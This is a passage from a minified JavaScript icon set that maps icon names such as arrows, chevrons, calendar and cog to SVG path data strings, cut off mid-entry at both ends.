0-.5.22-.5.5s.22.5.5.5z"],applications:["M15 5H1c-.55 0-1 .45-1 1v13c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm-1 13H2V8h12v10zM3.5 10h7c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-7c-.28 0-.5.22-.5.5s.22.5.5.5zm0 2h3c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-3c-.28 0-.5.22-.5.5s.22.5.5.5zm0 2h5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-5c-.28 0-.5.22-.5.5s.22.5.5.5zM19 0H5c-.55 0-1 .45-1 1v3h2V3h12v10h-1v2h2c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],"arrow-bottom-left":["M18 3a1.003 1.003 0 0 0-1.71-.71L4 14.59V7c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h10c.55 0 1-.45 1-1s-.45-1-1-1H5.41l12.3-12.29c.18-.18.29-.43.29-.71z"],"arrow-bottom-right":["M17 6c-.55 0-1 .45-1 1v7.59L3.71 2.29a1.003 1.003 0 0 0-1.42 1.42L14.59 16H7c-.55 0-1 .45-1 1s.45 1 1 1h10c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1z"],"arrow-down":["M16 11c-.3 0-.5.1-.7.3L11 15.6V2c0-.5-.4-1-1-1s-1 .5-1 1v13.6l-4.3-4.3c-.2-.2-.4-.3-.7-.3-.5 0-1 .4-1 1 0 .3.1.5.3.7l6 6c.2.2.4.3.7.3s.5-.1.7-.3l6-6c.2-.2.3-.4.3-.7 0-.6-.5-1-1-1z"],"arrow-left":["M18 9H4.41L8.7 4.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-6 6c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l6 6a1.003 1.003 0 0 0 1.42-1.42L4.41 11H18c.55 0 1-.45 1-1s-.45-1-1-1z"],"arrow-right":["M18.71 9.29l-6-6a1.003 1.003 0 0 0-1.42 1.42L15.59 9H2c-.55 0-1 .45-1 1s.45 1 1 1h13.59l-4.29 4.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l6-6c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],"arrow-top-left":["M17.71 16.29L5.41 4H13c.55 0 1-.45 1-1s-.45-1-1-1H3c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1s1-.45 1-1V5.41L16.29 17.7c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],"arrow-top-right":["M17 2H7c-.55 0-1 .45-1 1s.45 1 1 1h7.59L2.29 16.29a1.003 1.003 0 0 0 1.42 1.42L16 5.41V13c0 .55.45 1 1 1s1-.45 1-1V3c0-.55-.45-1-1-1z"],"arrow-up":["M16.7 7.3l-6-6c-.2-.2-.4-.3-.7-.3s-.5.1-.7.3l-6 6c-.2.2-.3.4-.3.7 0 .6.5 1 1 1 .3 0 .5-.1.7-.3L9 4.4V18c0 .5.4 1 1 1s1-.5 1-1V4.4l4.3 4.3c.2.2.4.3.7.3.5 0 1-.4 1-1 0-.3-.1-.5-.3-.7z"],"arrows-horizontal":["M19.7 9.3l-5-5c-.2-.2-.4-.3-.7-.3-.6 0-1 .4-1 1 0 .3.1.5.3.7L16.6 9H3.4l3.3-3.3c.2-.2.3-.4.3-.7 0-.6-.4-1-1-1-.3 0-.5.1-.7.3l-5 5c-.2.2-.3.4-.3.7s.1.5.3.7l5 5c.2.2.4.3.7.3.6 0 1-.4 1-1 0-.3-.1-.5-.3-.7L3.4 11h13.2l-3.3 3.3c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3l5-5c.2-.2.3-.4.3-.7s-.1-.5-.3-.7z"],"arrows-vertical":["M15 13c-.3 0-.5.1-.7.3L11 16.6V3.4l3.3 3.3c.2.2.4.3.7.3.6 0 1-.4 1-1 0-.3-.1-.5-.3-.7l-5-5c-.2-.2-.4-.3-.7-.3s-.5.1-.7.3l-5 5c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3L9 3.4v13.2l-3.3-3.3c-.2-.2-.4-.3-.7-.3-.6 0-1 .4-1 1 0 .3.1.5.3.7l5 5c.2.2.4.3.7.3s.5-.1.7-.3l5-5c.2-.2.3-.4.3-.7 0-.5-.4-1-1-1z"],asterisk:["M18.52 14.17l.01-.02L11.89 10l6.64-4.15-.01-.02A.97.97 0 0 0 19 5c0-.55-.45-1-1-1-.2 0-.37.07-.52.17l-.01-.02L11 8.2V1c0-.55-.45-1-1-1S9 .45 9 1v7.2L2.53 4.15l-.01.02A.922.922 0 0 0 2 4c-.55 0-1 .45-1 1 0 .36.2.66.48.83l-.01.02L8.11 10l-6.64 4.15.01.02A.97.97 0 0 0 1 15c0 .55.45 1 1 1 .2 0 .37-.07.52-.17l.01.02L9 11.8V19c0 .55.45 1 1 1s1-.45 1-1v-7.2l6.47 4.04.01-.02c.15.11.32.18.52.18.55 0 1-.45 1-1 0-.36-.2-.66-.48-.83z"],"automatic-updates":["M10 18c-4.42 0-8-3.58-8-8 0-2.52 1.18-4.76 3-6.22V5c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1H2c-.55 0-1 .45-1 1s.45 1 1 1h2.06C1.61 3.82 0 6.71 0 10c0 5.52 4.48 10 10 10 .55 0 1-.45 1-1s-.45-1-1-1zm0-16c1.64 0 3.15.49 4.42 1.34l1.43-1.43A9.869 9.869 0 0 0 10 0c-.55 0-1 .45-1 1s.45 1 1 1zm10 8c0-1.13-.2-2.21-.54-3.22L17.84 8.4A7.962 7.962 0 0 1 15 16.22V15c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1h-2.06c2.45-1.82 4.06-4.71 4.06-8zm0-7a1.003 1.003 0 0 0-1.71-.71L12 8.59l-2.29-2.3a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29s.53-.11.71-.29l7-7c.18-.18.29-.43.29-.71z"],badge:["M16.94 5.73c-.19-1.41.62-2.52 1.38-3.59L17.03.65C14.89 1.76 11.88 1.48 10 0 8.12 1.48 5.11 1.76 2.97.65L1.68 2.14c.76 1.07 1.57 2.18 1.38 3.59C2.68 8.59 0 10.94 1.4 14.08c.56 1.43 1.81 2.37 3.4 2.75 1.95.46 4.4.91 5.2 3.17.8-2.26 3.25-2.71 5.2-3.17 1.6-.38 2.84-1.32 3.4-2.75 1.4-3.14-1.28-5.49-1.66-8.35z"],"ban-circle":["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm5 11H5c-.55 0-1-.45-1-1s.45-1 1-1h10c.55 0 1 .45 1 1s-.45 1-1 1z"],"bank-account":["M19.2 8.02l-.78-.18C18.03 6.4 17.2 5.08 16.08 4l.5-2.28c.11-.42-.22-.78-.61-.72-1.06.12-2 .54-2.67 1.26-1.06-.42-2.34-.66-3.56-.66-3.12 0-5.79 1.5-7.4 3.72-.23-.05-.45-.11-.67-.11C.72 5.21 0 5.98 0 7c0 .72.39 1.32.95 1.62-.06.42-.12.9-.12 1.38 0 2.16.89 4.08 2.28 5.58l-.33 2.04c-.11.72.45 1.38 1.12 1.38h.72c.56 0 1-.42 1.11-1.02l.06-.48c1.17.54 2.5.9 3.95.9 1.39 0 2.78-.3 3.95-.9l.06.48c.11.6.56 1.02 1.11 1.02h.72c.67 0 1.22-.66 1.11-1.38l-.33-1.98c.78-.78 1.34-1.74 1.73-2.76l1-.24c.5-.12.89-.6.89-1.2V9.22c.11-.6-.28-1.08-.78-1.2zM15 10c-.6 0-1-.7-1-1.5S14.4 7 15 7s1 .7 1 1.5-.4 1.5-1 1.5zM7.55 5.83a.99.99 0 0 1-1.38-.28.99.99 0 0 1 .28-1.38c2.34-1.56 4.77-1.56 7.11 0 .46.31.58.93.28 1.39-.31.46-.93.58-1.39.28-1.67-1.12-3.23-1.12-4.9-.01z"],barcode:["M6 16.98h2v-14H6v14zm3 0h1v-14H9v14zm-6 0h2v-14H3v14zm-3 0h2v-14H0v14zm16 0h2v-14h-2v14zm-4 0h1v-14h-1v14zm7-14v14h1v-14h-1zm-5 14h1v-14h-1v14z"],blank:[],"blocked-person":["M11.55 15.92c-1.48-.65-1.28-1.05-1.33-1.59-.01-.07-.01-.15-.01-.23.51-.45.92-1.07 1.19-1.78 0 0 .01-.04.02-.05.06-.15.11-.32.15-.48.34-.07.54-.44.61-.78.06-.11.14-.35.17-.62C10.33 9.42 8.92 7.38 8.92 5c0-.3.05-.58.09-.87-.33-.08-.67-.13-.99-.13-.79 0-1.68.25-2.31.73-.61.47-1.07 1.13-1.29 1.86-.05.16-.09.33-.11.5-.12.6-.17 1.51-.17 2.14v.08c-.24.09-.45.32-.49.83-.04.39.12.73.2.87.08.35.28.72.63.78.04.17.09.33.15.48 0 .01.01.02.01.03l.01.01c.27.72.7 1.35 1.22 1.8 0 .07-.01.14-.01.21-.05.54.1.94-1.38 1.59C3 16.56.77 17.26.32 18.31-.15 19.38.04 20 .04 20h15.95s.18-.62-.27-1.67c-.46-1.06-2.69-1.75-4.17-2.41zM14.97 0c-2.78 0-5.03 2.24-5.03 5s2.25 5 5.03 5S20 7.76 20 5s-2.25-5-5.03-5zm-3.03 5c0-1.66 1.35-3 3.02-3 .47 0 .9.11 1.29.3l-4.01 3.99c-.18-.4-.3-.83-.3-1.29zm3.03 3c-.47 0-.9-.11-1.29-.3l4.01-3.99c.19.39.3.82.3 1.29 0 1.66-1.36 3-3.02 3z"],bold:["M14.3 9c.4-.8.7-1.6.7-2.5C15 4 13 2 10.5 2H5c-.6 0-1 .4-1 1v13c0 .6.4 1 1 1h6.5c2.5 0 4.5-2 4.5-4.5 0-1.4-.7-2.7-1.7-3.5zM7 5h3.5c.8 0 1.5.7 1.5 1.5S11.3 8 10.5 8H7V5zm4.5 9H7v-3h4.5c.8 0 1.5.7 1.5 1.5s-.7 1.5-1.5 1.5z"],book:["M3 1v18c0 .55.45 1 1 1h2V0H4c-.55 0-1 .45-1 1zm14-1h-2v8l-2-2-2 2V0H7v20h10c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],bookmark:["M6 0c-.55 0-1 .45-1 1v18c0 .55.32.68.71.29L9.3 15.7a.996.996 0 0 1 1.41 0l3.59 3.59c.38.39.7.26.7-.29v-8-4.5V1c0-.55-.45-1-1-1H6z"],box:["M19.89 6.56l-2.99-6h-.01C16.72.23 16.39 0 16 0H4c-.39 0-.72.23-.89.56H3.1l-3 6h.01C.05 6.69 0 6.84 0 7v12c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V7c0-.16-.05-.31-.11-.44zM11 2h4.38l2 4H11V2zM4.62 2H9v4H2.62l2-4zM18 18H2V8h16v10zM8 12h4c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1z"],briefcase:["M19 5h-4V2c0-.55-.45-1-1-1H6c-.55 0-1 .45-1 1v3H1c-.55 0-1 .45-1 1v5h4v-1h2v1h8v-1h2v1h4V6c0-.55-.45-1-1-1zm-6 0H7V3h6v2zm3 8h-2v-1H6v1H4v-1H0v6c0 .55.45 1 1 1h18c.55 0 1-.45 1-1v-6h-4v1z"],build:["M19.43 16.67L9.31 7.81l1.47-1.56c.41-.44-.15-.8.15-1.6 1.08-2.76 4.19-2.99 4.19-2.99s.45-.47.87-.92C11.98-1 9.26.7 8.04 1.8L3.83 6.25l-.86.92c-.48.51-.48 1.33 0 1.84l-.87.92c-.48-.51-1.26-.51-1.74 0s-.48 1.33 0 1.84l1.74 1.84c.48.51 1.26.51 1.74 0s.48-1.33 0-1.84l.87-.92c.48.51 1.26.51 1.74 0l1.41-1.49 8.81 10.07c.76.76 2 .76 2.76 0 .76-.76.76-2 0-2.76z"],calculator:["M16 0H4c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1h12c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM7 18H5v-2h2v2zm0-4H5v-2h2v2zm0-4H5V8h2v2zm4 8H9v-2h2v2zm0-4H9v-2h2v2zm0-4H9V8h2v2zm4 8h-2v-6h2v6zm0-8h-2V8h2v2zm0-4H5V2h10v4z"],calendar:["M15 5c.6 0 1-.4 1-1V2c0-.5-.4-1-1-1s-1 .5-1 1v2c0 .6.4 1 1 1zM5 5c.6 0 1-.4 1-1V2c0-.5-.4-1-1-1s-1 .5-1 1v2c0 .6.4 1 1 1zm13-2h-1v1c0 1.1-.9 2-2 2s-2-.9-2-2V3H7v1c0 1.1-.9 2-2 2s-2-.9-2-2V3H2c-.5 0-1 .5-1 1v14c0 .5.5 1 1 1h16c.5 0 1-.5 1-1V4c0-.5-.5-1-1-1zM7 17H3v-4h4v4zm0-5H3V8h4v4zm5 5H8v-4h4v4zm0-5H8V8h4v4zm5 5h-4v-4h4v4zm0-5h-4V8h4v4z"],camera:["M10 8c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3zm9-4h-3.59L13.7 2.29A.956.956 0 0 0 13 2H7c-.28 0-.53.11-.71.29L4.59 4H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h4.11c1.26 1.24 2.99 2 4.89 2s3.63-.76 4.89-2H19c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zM4 8H2V6h2v2zm6 8c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5z"],"caret-down":["M16 7c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1 0 .24.1.46.24.63l-.01.01 5 6 .01-.01c.19.22.45.37.76.37s.57-.15.76-.37l.01.01 5-6-.01-.01c.14-.17.24-.39.24-.63z"],"caret-left":["M13 4c-.24 0-.46.1-.63.24l-.01-.01-6 5 .01.01c-.22.19-.37.45-.37.76s.15.57.37.76l-.01.01 6 5 .01-.01c.17.14.39.24.63.24.55 0 1-.45 1-1V5c0-.55-.45-1-1-1z"],"caret-right":["M14 10c0-.31-.15-.57-.37-.76l.01-.01-6-5-.01.01C7.46 4.1 7.24 4 7 4c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1 .24 0 .46-.1.63-.24l.01.01 6-5-.01-.01c.22-.19.37-.45.37-.76z"],"caret-up":["M15.76 12.37l.01-.01-5-6-.01.01C10.57 6.15 10.31 6 10 6s-.57.15-.76.37l-.01-.01-5 6 .01.01c-.14.17-.24.39-.24.63 0 .55.45 1 1 1h10c.55 0 1-.45 1-1 0-.24-.1-.46-.24-.63z"],"cell-tower":["M11.5 8.32c.31-.35.51-.81.51-1.32 0-1.1-.9-2-2-2s-2 .9-2 2c0 .51.2.97.51 1.32L5.06 18.69c-.17.52.11 1.09.63 1.26s1.09-.11 1.26-.63L8.39 15h3.23l1.44 4.32c.17.52.74.81 1.26.63s.81-.74.63-1.26L11.5 8.32zM10.95 13H9.06l.95-2.84.94 2.84zM5.31 10.73a.996.996 0 1 0 1.37-1.45c-1.4-1.33-1.28-3.35-.01-4.54.4-.38.43-1.01.05-1.41-.36-.41-1-.43-1.4-.06-2.09 1.95-2.28 5.3-.01 7.46z","M4.6 12.2C3 11.1 2 9 2 7c0-2.1.9-3.9 2.6-5.2.5-.3.5-1 .2-1.4-.3-.5-1-.5-1.4-.2C1.2 1.9-.1 4.2 0 7c.1 2.7 1.4 5.3 3.4 6.8.2.1.4.2.6.2.3 0 .6-.1.8-.4.4-.5.3-1.1-.2-1.4zM13.27 10.69c.38.4 1.01.42 1.41.04 2.27-2.16 2.08-5.51-.01-7.46a.996.996 0 1 0-1.36 1.46c1.28 1.19 1.39 3.21-.01 4.54-.39.39-.41 1.02-.03 1.42z","M16.6.2c-.4-.3-1.1-.3-1.4.2-.3.4-.3 1.1.2 1.4C17.1 3.1 18 4.9 18 7c0 2-1 4.1-2.6 5.2-.5.3-.6.9-.2 1.4.2.3.5.4.8.4.2 0 .4-.1.6-.2C18.7 12.3 20 9.7 20 7c.09-2.8-1.2-5.1-3.4-6.8z"],changes:["M18 16H2c-1.1 0-2 .9-2 2s.9 2 2 2h16c1.1 0 2-.9 2-2s-.9-2-2-2zM3 5c.28 0 .53-.11.71-.29L5 3.41V13c0 .55.45 1 1 1s1-.45 1-1V3.41L8.29 4.7c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3C6.53.11 6.28 0 6 0s-.53.11-.71.29l-3 3A1.003 1.003 0 0 0 3 5zm7.29 5.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3a1.003 1.003 0 0 0-1.42-1.42L15 10.59V1c0-.55-.45-1-1-1s-1 .45-1 1v9.59L11.71 9.3A.965.965 0 0 0 11 9a1.003 1.003 0 0 0-.71 1.71z"],chart:["M7 11v8c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-8l-2 2-4-2zm-7 8c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-8l-6 3v5zM17 7l-3 3v9c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V8.74c-.26.15-.58.26-1 .26-1.92 0-2-2-2-2zm2-6h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.59L10.8 8.78 7.45 7.11v.01C7.31 7.05 7.16 7 7 7s-.31.05-.44.11V7.1l-6 3v.01c-.33.17-.56.5-.56.89 0 .55.45 1 1 1 .16 0 .31-.05.44-.11v.01L7 9.12l3.55 1.78v-.01c.14.06.29.11.45.11.28 0 .53-.11.71-.29L18 4.41V6c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1z"],chat:["M19 0H7c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h5.59l3.71 3.71c.17.18.42.29.7.29.55 0 1-.45 1-1v-3h1c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM7 13c-1.1 0-2-.9-2-2V4H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h1v3a1.003 1.003 0 0 0 1.71.71L7.41 16H13c.55 0 1-.45 1-1v-.17L12.17 13H7z"],"chevron-backward":["M8.41 10l5.29-5.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L7 8.59V4c0-.55-.45-1-1-1s-1 .45-1 1v12c0 .55.45 1 1 1s1-.45 1-1v-4.59l5.29 5.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L8.41 10z"],"chevron-down":["M16 6c-.28 0-.53.11-.71.29L10 11.59l-5.29-5.3a1.003 1.003 0 0 0-1.42 1.42l6 6c.18.18.43.29.71.29s.53-.11.71-.29l6-6A1.003 1.003 0 0 0 16 6z"],"chevron-forward":["M13 3c-.55 0-1 .45-1 1v4.59l-5.29-5.3a1.003 1.003 0 0 0-1.42 1.42l5.3 5.29-5.29 5.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l5.29-5.3V16c0 .55.45 1 1 1s1-.45 1-1V4c0-.55-.45-1-1-1z"],"chevron-left":["M8.41 10l5.29-5.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-6 6c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l6 6a1.003 1.003 0 0 0 1.42-1.42L8.41 10z"],"chevron-right":["M13.71 9.29l-6-6a1.003 1.003 0 0 0-1.42 1.42l5.3 5.29-5.29 5.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l6-6c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],"chevron-up":["M16.71 12.29l-6-6C10.53 6.11 10.28 6 10 6s-.53.11-.71.29l-6 6a1.003 1.003 0 0 0 1.42 1.42L10 8.41l5.29 5.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],circle:["M10 0C4.5 0 0 4.5 0 10s4.5 10 10 10 10-4.5 10-10S15.5 0 10 0zm0 18c-4.4 0-8-3.6-8-8s3.6-8 8-8 8 3.6 8 8-3.6 8-8 8z"],"circle-arrow-down":["M14 10c-.28 0-.53.11-.71.29L11 12.59V5c0-.55-.45-1-1-1s-1 .45-1 1v7.59L6.71 10.3A.965.965 0 0 0 6 10a1.003 1.003 0 0 0-.71 1.71l4 4c.18.18.43.29.71.29s.53-.11.71-.29l4-4A1.003 1.003 0 0 0 14 10zM10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z"],"circle-arrow-left":["M15 9H7.41L9.7 6.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-4 4c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L7.41 11H15c.55 0 1-.45 1-1s-.45-1-1-1zm-5-9C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z"],"circle-arrow-right":["M15.71 9.29l-4-4a1.003 1.003 0 0 0-1.42 1.42L12.59 9H5c-.55 0-1 .45-1 1s.45 1 1 1h7.59l-2.29 2.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4-4c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zM10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z"],"circle-arrow-up":["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8zm.71-13.71C10.53 4.11 10.28 4 10 4s-.53.11-.71.29l-4 4a1.003 1.003 0 0 0 1.42 1.42L9 7.41V15c0 .55.45 1 1 1s1-.45 1-1V7.41l2.29 2.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-4-4z"],citation:["M4 1C1.79 1 0 2.79 0 5s1.79 4 4 4c.1 0 .2-.01.3-.02C3.82 11.32 2.53 13 1 13c-.55 0-1 .45-1 1s.45 1 1 1c3.87 0 7-4.48 7-10 0-2.21-1.79-4-4-4zM16 1c-2.21 0-4 1.79-4 4s1.79 4 4 4c.1 0 .2-.01.3-.02C15.82 11.32 14.53 13 13 13c-.55 0-1 .45-1 1s.45 1 1 1c3.87 0 7-4.48 7-10 0-2.21-1.79-4-4-4z"],clean:["M7 0L5 5 0 6.998 5 9l2 5 2-5 5-1.995L9 5zM15 10l-1.5 3.496-3.5 1.499 3.5 1.498L15 20l1.5-3.507L20 15l-3.5-1.504z"],clipboard:["M13 2c0-.55-.45-1-1-1h-.78a1.98 1.98 0 0 0-3.44 0H7c-.55 0-1 .45-1 1v2h7V2z","M16 2h-2v3H5V2H3c-.55 0-1 .45-1 1v16c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1z"],cloud:["M15 7c-.12 0-.24.03-.36.04C13.83 4.69 11.62 3 9 3 5.69 3 3 5.69 3 9c0 .05.01.09.01.14A3.98 3.98 0 0 0 0 13c0 2.21 1.79 4 4 4h11c2.76 0 5-2.24 5-5s-2.24-5-5-5z"],"cloud-download":["M15 4c-.12 0-.24.03-.36.04C13.83 1.69 11.62 0 9 0 5.69 0 3 2.69 3 6c0 .05.01.09.01.14A3.98 3.98 0 0 0 0 10c0 2.21 1.79 4 4 4h.78c.55-.61 1.34-1 2.22-1v-2c0-1.66 1.34-3 3-3s3 1.34 3 3v2c.88 0 1.66.38 2.2.98C17.87 13.87 20 11.69 20 9c0-2.76-2.24-5-5-5zm-2 11c-.28 0-.53.11-.71.29L11 16.59V11c0-.55-.45-1-1-1s-1 .45-1 1v5.59L7.71 15.3A.965.965 0 0 0 7 15a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 13 15z"],"cloud-upload":["M10.71 10.29c-.18-.18-.43-.29-.71-.29s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42L9 13.41V19c0 .55.45 1 1 1s1-.45 1-1v-5.59l1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3zM15 4c-.12 0-.24.03-.36.04C13.83 1.69 11.62 0 9 0 5.69 0 3 2.69 3 6c0 .05.01.09.01.14A3.98 3.98 0 0 0 0 10c0 2.21 1.79 4 4 4 0-.83.34-1.58.88-2.12l3-3a2.993 2.993 0 0 1 4.24 0l3 3-.01.01c.52.52.85 1.23.87 2.02C18.28 13.44 20 11.42 20 9c0-2.76-2.24-5-5-5z"],code:["M6 6a1.003 1.003 0 0 0-1.71-.71l-4 4C.11 9.47 0 9.72 0 10c0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L2.41 10 5.7 6.71c.19-.18.3-.43.3-.71zm6-4c-.46 0-.83.31-.95.73l-4 14c-.02.09-.05.17-.05.27 0 .55.45 1 1 1 .46 0 .83-.31.95-.73l4-14c.02-.09.05-.17.05-.27 0-.55-.45-1-1-1zm7.71 7.29l-4-4a1.003 1.003 0 0 0-1.42 1.42l3.3 3.29-3.29 3.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4-4c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],"code-block":["M19 5h-2V3c0-.55-.45-1-1-1h-4c-.55 0-1 .45-1 1v2H9V3c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v2H1c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zM8.71 15.29a1.003 1.003 0 0 1-1.42 1.42l-4-4C3.11 12.53 3 12.28 3 12s.11-.53.29-.71l4-4a1.003 1.003 0 0 1 1.42 1.42L5.41 12l3.3 3.29zm8-2.58l-4 4a1.003 1.003 0 0 1-1.42-1.42l3.3-3.29-3.29-3.29A.965.965 0 0 1 11 8a1.003 1.003 0 0 1 1.71-.71l4 4c.18.18.29.43.29.71s-.11.53-.29.71z"],cog:["M19 8h-2.31c-.14-.46-.33-.89-.56-1.3l1.7-1.7a.996.996 0 0 0 0-1.41l-1.41-1.41a.996.996 0 0 0-1.41 0l-1.7 1.7c-.41-.22-.84-.41-1.3-.55V1c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1v2.33c-.48.14-.94.34-1.37.58L5 2.28a.972.972 0 0 0-1.36 0L2.28 3.64c-.37.38-.37.99 0 1.36L3.9 6.62c-.24.44-.44.89-.59 1.38H1c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h2.31c.14.46.33.89.56 1.3L2.17 15a.996.996 0 0 0 0 1.41l1.41 1.41c.39.39 1.02.39 1.41 0l1.7-1.7c.41.22.84.41 1.3.55V19c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-2.33c.48-.14.94-.35 1.37-.59L15 17.72c.37.37.98.37 1.36 0l1.36-1.36c.37-.37.37-.98 0-1.36l-1.62-1.62c.24-.43.45-.89.6-1.38H19c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1zm-9 6c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4z"],"collapse-all":["M9.29 8.71c.18.18.43.29.71.29s.53-.11.71-.29l6-6a1.003 1.003 0 0 0-1.42-1.42L10 6.59l-5.29-5.3a1.003 1.003 0 0 0-1.42 1.42l6 6zm1.42 2.58c-.18-.18-.43-.29-.71-.29s-.53.11-.71.29l-6 6a1.003 1.003 0 0 0 1.42 1.42l5.29-5.3 5.29 5.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-6-6z"],"column-layout":["M19 1H1c-.55 0-1 .45-1 1v16c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zM5 17H2V3h3v14zm4 0H6V3h3v14zm9 0h-8V3h8v14z"],comment:["M19 1H1c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h3v4a1.003 1.003 0 0 0 1.71.71l4.7-4.71H19c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zM4 10c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm6 0c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm6 0c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2z"],comparison:["M6 8H1c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1zm13-6h-5c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm0 3h-5V3h5v2zM6 14H1c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h5c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1zM6 2H1c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm4-2c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm9 14h-5c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h5c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1zm0 3h-5v-2h5v2zm0-9h-5c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1zm0 3h-5V9h5v2z"],compass:["M15 10c0 .14-.03.28-.09.4l-3.99 8.98-.01.02a.991.991 0 0 1-1.82 